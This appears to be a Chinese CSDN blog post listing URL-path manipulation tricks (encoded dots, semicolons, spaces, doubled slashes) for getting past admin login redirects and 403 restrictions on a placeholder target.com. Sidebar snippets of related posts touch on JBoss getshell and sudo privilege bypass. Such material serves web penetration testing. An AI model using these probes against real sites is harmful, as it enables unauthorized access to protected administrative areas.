一些权限的绕过

最新推荐文章于 2023-03-22 20:31:43 发布
最新推荐文章于 2023-03-22 20:31:43 发布
阅读量435 收藏
点赞数
分类专栏: web 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54515836/article/details/119745128
版权

一些权限的绕过

URI绕过后台

这是通过以下方式URI来访问后台的技巧:

  • https://target.com/admin/ –> HTTP 302(重定向到登录页面)
  • https://target.com/admin…;/ –> HTTP 200 OK
  • https://target.com/…/admin
  • https://target.com/whatever/…;/admin
target.com/admin –> HTTP 302 (重定向到登陆页面)
/admin%20/ -> HTTP 200 OK
/%20admin%20/ -> HTTP 200 OK
/admin%20/page -> HTTP 200 OK
/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#

URI绕过403

该技巧与上一个技巧非常相似。通过篡改URI,我们也许可以绕过应用程序的访问控制:

  • site.com/secret –>禁止HTTP 403
  • site.com/secret/ ->HTTP 200 OK
  • site.com/secret/。 –> HTTP 200 ok
  • site.com//secret// ->HTTP 200 OK
  • site.com/./secret/… –> HTTP 200 OK

很少见到,但可以尝试一下。

HoAd's blog
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
绕过后台登陆页直接进入后台
weixin_34408624的博客
01-30 1374
一般在ADMIN的目录底下都有LOGIN.ASP 打开这个文件会发现有如下类似的代码 <% pwd = request.form("pwd") name = request.form("name") Set rs = Server.CreateObject("ADODB.Connection") sql = "select * from Manage_User wher...
Jboss漏洞
weixin_43873557的博客
02-05 333
➢ Jboss概述 一个基于J2EE的开放源代码的应用服务器。JBoss是一个管理EJB的容器和服务器, 但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使 用。Jboss是Java EE应用服务器(就像Apache是web服务器一样),专门用来运行 Java EE程序的。 ➢ Jboss历史漏洞(访问控制不严导致的漏洞) JMX Console未授权访问Getshell JMX Console HtmlAdaptor Getshell(CVE-2007-
filter设计缺陷导致的权限绕过
蚁景网安学院
06-16 2474
1.1 权限控制的本质一般来说,为了防止越权操作,通常会结合filter进⾏相关接⼝的鉴权操作。其中不不外乎就是对每⼀个接口(通俗来说就是我们的URI/URL)进行业务梳理,然后判断当前...
绕过网站访问限制
weixin_30650039的博客
07-15 3875
平时访问网站或者做 CTF 题的时候会遇到网站限制访问的问题,下面是一些小技巧,主要是通过 BurpSuite 拦截 HTTP 请求并根据需要修改 HTTP 请求头的内容来达到绕过的目的 看起来只允许国外访问,有可能是 HTTP 请求头中的 Accept-Language 为中文(cn-zh),修改为英文(en-us)即可 浏览器类型限制:修改 HTTP 请求中的 User-Agent IP地址...
Drupal 访问权限绕过漏洞
小小猪的博客
11-15 922
Drupal 访问权限绕过漏洞 前言: 当地时间7月17日,Drupal官方发布安全通告修复了一个访问绕过漏洞(CVE-2019-6342)。在Drupal 8.7.4中,当启用实验性工作区模块(experimental Workspaces module)时,将为攻击者创造访问绕过的条件。Drupal官方将该漏洞定级为严重(Critical)。 受影响的版本: Drupal Version == 8.7.4 漏洞复现: 安装Drupal 8.7.4版本,登录管理员账户,进入后...
如何绕过类的权限检查访问private变量?
darmao的博客
06-22 549
主要原理就是:首先搞明白对象的内存布局,然后直接用对象的首地址加上某个成员变量在对象中的偏移值去访问。下边代码中的这个例子,对象的内存布局为:直接用首地址加上偏移值去访问即可。#include &lt;iostream&gt; using namespace std; class CNumber { public: CNumber() { this-&gt;nums=10; this-...
绕过权限全局遮罩
02-28
绕过权限全局遮罩,通过反射Toast实现全局遮罩 资源分最低要求2 对不住了
S17-shiro权限绕过1
08-03
在本文中,我们将深入探讨 "S17-shiro权限绕过1" 的相关知识,包括 Shiro 的核心组件、权限配置以及可能存在的安全漏洞。 首先,我们需要理解 Shiro 的主要组件: 1. **Realm**: Realm 是 Shiro 与应用程序特定...
绕过系统密码
08-24
总的来说,绕过系统密码是一个复杂且具有风险的过程,涉及多个技术层面,包括操作系统的工作原理、安全策略以及漏洞利用。了解这些知识对于IT专业人士来说是必要的,但同时也需要认识到其潜在的法律和安全风险。在...
基于ChakraJIT的CFG绕过技术
02-25
在本文中,我们将向读者介绍在攻击InternetExplorer和Edge浏览器时可用于绕过Microsoft的控制流防护(CFG)的方法。我们以前的概念验证性质的漏洞利用代码是通过覆盖对象的函数指针来实现的。但是,当遇到CFG时,这种...
AndroidUSB热敏打印机使用动态申请权限绕过系统权限对话框
03-05
本文将深入探讨如何在Android系统中动态申请权限,从而绕过系统权限对话框,以实现更流畅的用户体验。这一方法尤其适用于那些需要频繁使用USB打印机的应用。 首先,Android 6.0(API级别23)引入了运行时权限模型,...
记一次登陆权限绕过
三天不打上房揭瓦的博客
03-22 390
微信搜索:众亦信安 声明:文中涉及到的技术和工具,仅供学习使用,禁止从事任何非法活动,如因此造成的直接或间接损失,均由使用者自行承担责任。
越权访问之——越权漏洞突破思路
温柔小薛的博客
04-20 1769
越权漏洞突破思路 1.一般管理页面可能存在越权漏洞 如果是白盒测试的话 找到admin相关 需要管理员账号才可以访问的文件 针对于前端绕过 访问该目录,可能会有一个js拦截,我们利用浏览器隐私安全性设置找到javascrip禁用 添加网站,再次进入可能会成功 针对于后端绕过 对于没有判断登录状态refer或者判断不标准,抓包修改为合法的refer就可以绕过 2.有的对于用户管理的地方可能有,例如更...
简单的文件上传漏洞以及前端后端的简单绕过思路
太阳照耀我走四方
02-14 1073
简单的文件上传漏洞以及前端后端的简单绕过思路
APP渗透测试-登录、权限绕过
weixin_48350129的博客
07-13 3043
比较万能的方法-修改响应包 这种方法对于企业内不大型的APP真的百试百灵。 响应包中包含状态码的参数,例如code=*****,success=false/true,这类参数是修改响应包的关键。 例: 首先抓需要绕过的登录包(或者其它需要绕过验证的包),以burp为例,开启抓包,抓到对应的请求包后,右键选择“Response to this request”,这个选项可以让响应包也被拦截,就可以篡改响应包。 修改参数,一般认证成功的参数都是200、true。 原理及整改 原理:修改响应包的参数来绕过,利
php网站如何绕过权限,网站管理员权限实现思路-自我想法
weixin_35377249的博客
03-10 891
网站管理员权限实现思路-自我想法!!学习PHP有一段时间了,因为学习原生PHP,在模板引擎这块遇到了点挫折!现在跟着我朋友研究TP5,现有的MVC方式,感觉学起来还是比较方便的,等到了足够了解TP的时候,回来在学PHP,应该会有不一样的感觉了吧!进入主题谈论一下我个人对于管理员权限的实现思路!我这个菜鸟级别程序员的思路,也许有错误。。希望大神可以稍微指点指点呀!我的思路是根据文章与栏目的关系划分想...
linux 主机无密码访问权限,Linux主机ssh无密码登录
weixin_29735819的博客
04-30 111
#产生公钥(最简单的方式,使用下面的命令一路回车)#运行结束后在$HOME/.ssh目录下会产生id_rsa和id_ras.pub文件#rsa是指加密的算法ssh-keygen-trsa#将本机上的公钥拷贝到需要从本机进行远程登录的主机上#目标主机拥有本机的公钥文件,说明本机对于目标主机是可信,可靠的#拷贝的命令很简单,如下(最好不要自己手动去拷贝,过多的人为操作,意味着错误更多)#该过程需...
403 Forbidden错误原因
沐雨金鳞
09-08 492
1、你的IP被列入黑名单。 2、你在一定时间内过多地访问此网站(一般是用采集程序),被防火墙拒绝访问了。 3、网站域名解析到了空间,但空间未绑定此域名。 4、你的网页脚本文件在当前目录下没有执行权限。 5、在不允许写/创建文件的目录中执行了创建/写文件操作。 6、以http方式访问需要ssl连接的网址。 7、浏览器不支持SSL 128时访问SSL 128的连接。 8、在身份验证的过程中输入了错误的密码。 9、DNS解析错误,手动更改DNS服务器地址。 10、连接的用户过多,可以过后再试。
sudo 命令绕过权限
最新发布
05-17
sudo命令是Linux系统中的一个命令,可以让普通用户以超级用户(root)的身份运行某些命令。它的作用是提高系统安全性,避免普通用户随意修改系统文件或执行危险的操作。 如果你想绕过权限,可以尝试以下方法: 1. 直接使用root账号登录系统,这样就可以直接执行任何命令,不需要使用sudo命令。 2. 修改sudoers文件,将自己的用户添加到sudoers文件中,允许自己使用sudo命令执行任何命令。 3. 利用系统漏洞或者安全漏洞,获取root权限。 需要注意的是,绕过权限是一种不道德的行为,可能会导致系统崩溃或者数据丢失等问题,因此在使用sudo命令时应该谨慎操作,不要滥用权限

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

HoAd's blog

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值